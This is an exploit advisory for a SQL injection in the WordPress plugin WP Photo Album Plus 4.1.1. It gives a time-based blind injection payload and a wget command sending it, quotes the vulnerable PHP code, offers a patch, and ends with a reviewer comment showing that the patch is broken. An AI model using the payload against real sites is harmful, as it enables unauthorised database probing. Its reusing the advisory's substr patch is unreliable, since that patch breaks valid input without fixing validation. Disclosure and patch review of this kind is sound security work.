
WordPress Photo Album Plus 4.1.1 SQL Injection

Posted on 15 October 2011

# Exploit Title: WP Photo Album Plus <= 4.1.1 SQL Injection Vulnerability # Date: 2011-10-14 # Author: Skraps (jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo) # Plugin Page: http://wordpress.org/extend/plugins/wp-photo-album-plus/ # Software Link: http://downloads.wordpress.org/plugin/wp-photo-album-plus.zip # Version: 4.1.1 (tested) --------------- PoC (POST data) --------------- http://127.0.0.1/wordpress/?page_id=7&wppa-album=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)&wppa-cover=0&wppa-occur=1 wppa-album=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)&wppa-cover=0&wppa-occur=1 e.g. wget http://127.0.0.1/wordpress/?page_id=7&wppa-album=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)&wppa-cover=0&wppa-occur=1 --------------- Vulnerable code --------------- Line 490 of wppa-functions.php: if (($occur == $ref_occur) && wppa_get_get('album')) { $id = wppa_get_get('album'); $wppa['is_cover'] = wppa_get_get('cover'); } ... ... if (is_numeric($id)) { if ($wppa['is_cover']) $q = $wpdb->prepare('SELECT * FROM ' . WPPA_ALBUMS . ' WHERE `id`= %s', $id); else $q = $wpdb->prepare('SELECT * FROM ' . WPPA_ALBUMS . ' WHERE `a_parent`= %s '. wppa_get_album_order(), $id); $albums = $wpdb->get_results($q, 'ARRAY_A'); Line 3170 of wppa-functions.php: function wppa_get_get($index, $default = false) { if (isset($_GET['wppa-'.$index])) { // New syntax first return $_GET['wppa-'.$index]; } if (isset($_GET[$index])) { // Old syntax return $_GET[$index]; } return $default; } --------------- Patch --------------- *** ./wppa-functions.php 2011-10-14 19:15:11.574775456 -0400 --- ./wppa-functions.php.new 2011-10-14 19:13:14.735784321 -0400 *************** *** 506,513 **** // Top-level album has no cover if ($id == '0') $wppa['is_cover'] = '0'; - // Do the query if (is_numeric($id)) { if ($wppa['is_cover']) $q = $wpdb->prepare('SELECT * FROM ' . WPPA_ALBUMS . 
' WHERE `id`= %s', $id); else $q = $wpdb->prepare('SELECT * FROM ' . WPPA_ALBUMS . ' WHERE `a_parent`= %s '. wppa_get_album_order(), $id); --- 506,513 ---- // Top-level album has no cover if ($id == '0') $wppa['is_cover'] = '0'; // Do the query + $id=substr($id,3); if (is_numeric($id)) { if ($wppa['is_cover']) $q = $wpdb->prepare('SELECT * FROM ' . WPPA_ALBUMS . ' WHERE `id`= %s', $id); else $q = $wpdb->prepare('SELECT * FROM ' . WPPA_ALBUMS . ' WHERE `a_parent`= %s '. wppa_get_album_order(), $id); *************** *** 3384,3387 **** global $wppa; if ( $wppa['any'] ) echo $wppa['searchresults']; ! } No newline at end of file --- 3384,3387 ---- global $wppa; if ( $wppa['any'] ) echo $wppa['searchresults']; ! }
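Review bot: The added `$id=substr($id,3);` in the 506,513 hunk is not input validation: it discards the first three characters of whatever `wppa-album` carried, so a legitimate `wppa-album=1` becomes an empty string and fails `is_numeric`, while any longer value is still gated only by the same `is_numeric` check as before (which also accepts whitespace-prefixed, float and exponent forms). Validate the value as an integer and let the placeholder type match: `$id = filter_var($id, FILTER_VALIDATE_INT); if ($id !== false) {` followed by `$wpdb->prepare('SELECT * FROM ' . WPPA_ALBUMS . ' WHERE id = %d', $id)` in both the `id` and `a_parent` branches, which also turns the loose `if ($id == '0')` on the preceding context line into a strict integer comparison. The `. wppa_get_album_order()` suffix is concatenated outside the prepared statement; its body is not on this page, so if it is ever derived from request input it needs the same whitelisting rather than relying on `prepare()`. The enclosing function starts and ends outside the hunk, and the second hunk (3384,3387) only adds a trailing newline.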

 
